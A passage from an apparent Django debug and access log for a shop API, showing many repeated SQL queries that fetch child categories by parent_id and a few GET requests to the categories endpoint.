"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:30:38,343 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:30:38,347 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:30:38,351 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:30:38,357 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:30:38,361 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:30:38,365 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:30:38,369 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:30:38,374 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:30:38,380 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:30:38,384 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:30:38,388 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:30:38,393 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:30:38,398 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:30:38,402 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:30:38,408 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:30:38,412 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:30:38,417 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:30:38,421 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:30:38,425 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:30:38,431 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:30:38,435 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:30:38,439 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:30:38,443 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:30:38,447 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:30:38,453 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:30:38,457 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:30:38,461 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:30:38,465 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:30:38,469 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:30:38,473 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:30:38,478 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:30:38,482 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:30:38,487 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:30:38,492 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:30:38,496 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:30:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:32:01] "GET / HTTP/1.0" 302 0 [19/Dec/2019 13:37:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:37:53,368 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:37:53,374 utils 4252 140031721535232 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:37:53,381 utils 4252 140031747061504 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:37:53,388 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 13:37:53] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:37:53,394 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:37:53,398 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:37:53,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:37:53,408 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:37:53,412 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:37:53,416 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:37:53,420 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:37:53,425 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:37:53,429 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:37:53,433 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:37:53,437 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:37:53,441 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:37:53,447 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:37:53,451 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:37:53,454 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:37:53,458 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:37:53,463 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:37:53,469 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:37:53,473 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:37:53,477 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:37:53,481 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:37:53,485 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:37:53,488 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:37:53,494 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:37:53,496 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:37:53,498 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:37:53,500 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:37:53,502 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 